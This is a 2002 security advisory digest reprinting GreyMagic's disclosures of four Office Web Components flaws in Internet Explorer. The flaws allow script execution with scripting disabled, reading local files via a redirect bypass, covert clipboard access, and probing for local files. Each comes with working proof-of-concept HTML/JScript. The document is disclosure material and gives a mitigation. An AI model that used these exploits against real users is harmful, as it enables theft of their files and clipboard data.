26th Sep 2002 [SBWID-5254]
COMMAND
	Multiple vulnerabilities via Office Web Components / IE
SYSTEMS AFFECTED
	 IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
	 IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
	 IE6 Win2000 + Office 2000 (OWC9), all patches.
	 IE5.5sp2 NT4 sp6a + OWC10, all patches.
	 IE6sp1 Win2000 + OWC10, all patches.
	 IE6 WinXP + Office XP (OWC10), all patches.
	 IE6sp1 WinXP + Office XP (OWC10), all patches.
PROBLEM
	In   GreyMagic   Security   [http://security.greymagic.com]   advisories
	[GM#005-IE] [GM#006-IE] [GM#007-IE] [GM#008-IE] :
	GeyMagic security team unveiled multiple vulnerabilities in  office  web
	components,
	 Introduction:
	 =============
	Office Web Components (OWC) is a group of safe for scripting  components
	used to enrich HTML documents with Spreadsheets,  Charts,  Pivot  tables
	and more.
	OWC  ships  with  the  Microsoft  Office  package,  but   it   is   also
	downloadable as a separate (free for viewing only) component.
	
	 Vulnerability N�1 : Scripting for the scriptless
	 ================================================
	
	Office XP introduced OWC10, which added many interesting  features.  One
	of the features added to the  Spreadsheet  component  is  the  "=HOST()"
	formula, which returns a handle to the hosting environment.
	It is possible to use this formula  in  order  to  manipulate  the  DOM,
	which is a security issue in itself when Active Scripting  is  disabled,
	but  it's  somewhat  limited  because  there's  no  way  to  add   logic
	(conditions, loops, etc.) to the calls made.
	However, with a bit  of  manipulation  it  is  possible  to  get  Active
	Scripting to kick in. By using  the  setTimeout  method  of  the  window
	object through the "=HOST()" formula it is possible  to  execute  script
	with any language available to the host (IE).
	 Exploit:
	 ========
	This  example  will  display  a  message  box  even  when  scripting  is
	disabled; it contains many quotes because  several  levels  of  escaping
	are needed:
	
	<object classid="clsid:0002E551-0000-0000-C000-000000000046"
	style="display:none">
	    <param
	        name="csvdata"
	        value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3
	equals """"+(i+3));"",10,""jscript"")"'
	    >
	</object>
	
	See : [http://security.greymagic.com/adv/gm005-ie/]
	
	 Vulnerability N�2 : Reading local files
	 =======================================
	
	Using the Spreadsheet component in both OWC9 and OWC10, it  is  possible
	to read any local or remote file.
	The "LoadText" method of the Range object  takes  a  URL  as  its  first
	argument; it throws an error if the URL supplied  is  not  in  the  same
	domain as the current document.
	However, this protection can be easily bypassed by supplying a URL  that
	will redirect to the desired local or remote file.
	OWC is fooled to think that the URL is safe and loads  the  contents  of
	the file into the spreadsheet;  it  is  then  trivial  to  retrieve  the
	content and transfer it to the server or use it in malicious ways.
	 Exploit:
	 ========
	This example reads the contents  of  the  file  "c:/test.txt",  the  URL
	"getFile.asp" is redirecting to  "file://c:/test.txt",  allowing  us  to
	access it:
	
	<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
	style="display:none"></object>
	<script language="jscript">
	onload=function () {
	    try {
	        // Load file into spreadsheet
	        oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");
	        // Read the spreadsheet
	        var oRng=oSP.ActiveSheet.UsedRange,
	            iRows=oRng.Rows.Count,
	            iCols=oRng.Columns.Count,
	            sRes="";
	        for (var iCRow=1;iCRow<=iRows;iCRow++) {
	            for (var iCCol=1;iCCol<=iCols;iCCol++) {
	                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
	            }
	            sRes+="\n";
	        }
	        // Display result
	        alert(sRes);
	    }
	    catch (oErr) {
	        // Failed
	        alert("File not found.");
	    }
	}
	</script>
	
	The class id of the <object> element above  is  for  the  spreadsheet
	component  of  OWC9  (Microsoft  Office  2000),  OWC10's  class  id   is
	"0002E551-0000-0000-C000-000000000046", no further changes in  code  are
	needed.
	An attacker can actually use the fallback  feature  of  the  <object>
	element to include either one of these components:
	
	<!-- Try to include OWC10 -->
	<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
	style="display:none">
	    <!-- Failed, try to include OWC9 -->
	    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
	style="display:none">
	        <!-- None found -->
	        Failed to load any of the spreadsheet components.
	    </object>
	</object>
	
	See : [http://security.greymagic.com/adv/gm006-ie/]
	
	 Vulnerability N�3 : Controlling the clipboard
	 =============================================
	
	It is well documented that IE lets  anybody  read  and  write  clipboard
	data by default, until now it was possible to disable  this  feature  by
	setting "Allow paste operations via script" to "Disable".
	It is now possible to gain control over the clipboard even  when  it  is
	disabled in the security zone, via the  Spreadsheet  component  in  both
	OWC9 and OWC10.
	The "Paste" method of the Range object and  the  "Copy"  method  of  the
	Cell  object  both  give  an  attacker  full  control   over   clipboard
	operations.
	The attacker can continuously monitor the  victim's  clipboard  and  log
	the findings to a server for later inspection. It is also  possible  for
	an attacker to place data inside the clipboard.
	 Exploit:
	 ========
	Reading the contents of the clipboard:
	
	<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
	style="display:none"></object>
	<script language="jscript">
	onload=function () {
	    // Paste to spreadsheet
	    oSP.ActiveSheet.UsedRange.Paste();
	    // Read the spreadsheet
	    var oRng=oSP.ActiveSheet.UsedRange,
	        iRows=oRng.Rows.Count,
	        iCols=oRng.Columns.Count,
	        sRes="";
	    for (var iCRow=1;iCRow<=iRows;iCRow++) {
	        for (var iCCol=1;iCCol<=iCols;iCCol++) {
	            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
	        }
	        sRes+="\n";
	    }
	    // Display result
	    alert(sRes);
	}
	</script>
	
	Assigning the clipboard's content:
	
	<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
	style="display:none"></object>
	<script language="jscript">
	onload=function () {
	    oSP.Cells(1,1).Value="Trustworthy computing";
	    oSP.Cells(1,1).Copy();
	}
	</script>
	
	The class id of the <object> element above  is  for  the  spreadsheet
	component  of  OWC9  (Microsoft  Office  2000),  OWC10's  class  id   is
	"0002E551-0000-0000-C000-000000000046", no further changes in  code  are
	needed.
	An attacker can actually use the fallback  feature  of  the  <object>
	element to include either one of these components:
	
	<!-- Try to include OWC10 -->
	<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
	style="display:none">
	    <!-- Failed, try to include OWC9 -->
	    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
	style="display:none">
	        <!-- None found -->
	        Failed to load any of the spreadsheet components.
	    </object>
	</object>
	
	See : [http://security.greymagic.com/adv/gm007-ie/]
	
	 Vulnerability N�4 : Multiple local files detection
	 ==================================================
	
	There are several ways to check whether local  files  exist  using  OWC9
	and OWC10.
	The first vulnerability is in the  Chart  component  in  both  OWC9  and
	OWC10. The "Load" method does not perform  any  security  check  on  the
	assigned URL and throws an error when given a file name  that  does  not
	exist, otherwise the file exists.
	The second vulnerability is in the Spreadsheet component in  OWC10.  The
	"XMLURL" property blindly follows redirections, so  it  is  possible  to
	assign it a URL which redirects to a local file  and  determine  whether
	it exists or not by the error  thrown.  It  is  also  possible  to  read
	properly formatted WorkSheet XML files from disallowed locations in  the
	same way.
	The third vulnerability is in the DataSourceControl component in  OWC10.
	The "ConnectionFile" property does not perform any  security  checks  on
	the assigned URL. Therefore, it is possible to assign a local  file  and
	determine whether it exists or not by the error thrown.
	 Exploit:
	 ========
	A simple exploit for the first vulnerability:
	
	<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"
	style="display:none"></object>
	<!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
	<script language="jscript">
	onload=function () {
	    try {
	        oCS.Load("file://c:/test.txt");
	        alert("File exists!");
	    }
	    catch (oErr) {
	        alert("File does not exist.");
	    }
	}
	</script>
	
	A simple exploit for the second vulnerability, "getFile.asp"  internally
	redirects to "file://c:/test.txt":
	
	<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
	style="display:block"></object>
	<script language="jscript">
	onload=function () {
	    try {
	        oSP.XMLURL="getFile.asp";
	    }
	    catch (oErr) {
	        alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" :
	"File does not exist.");
	    }
	}
	</script>
	
	A simple exploit for the third vulnerability:
	
	<object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046"
	style="display:block"></object>
	<script language="jscript">
	onload=function () {
	    try {
	        oDS.ConnectionFile="file://c:/test.txt";
	    }
	    catch (oErr) {
	        alert(oErr.number==-2146697211 ? "File does not exist." : "File
	exists!");
	    }
	}
	</script>
	
	See : [http://security.greymagic.com/adv/gm008-ie/]
SOLUTION
	Set  "Run  ActiveX  controls  and  plug-ins"  to  "Disable"  or   simply
	remove/disable OWC until a patch becomes available.
	No patches yet.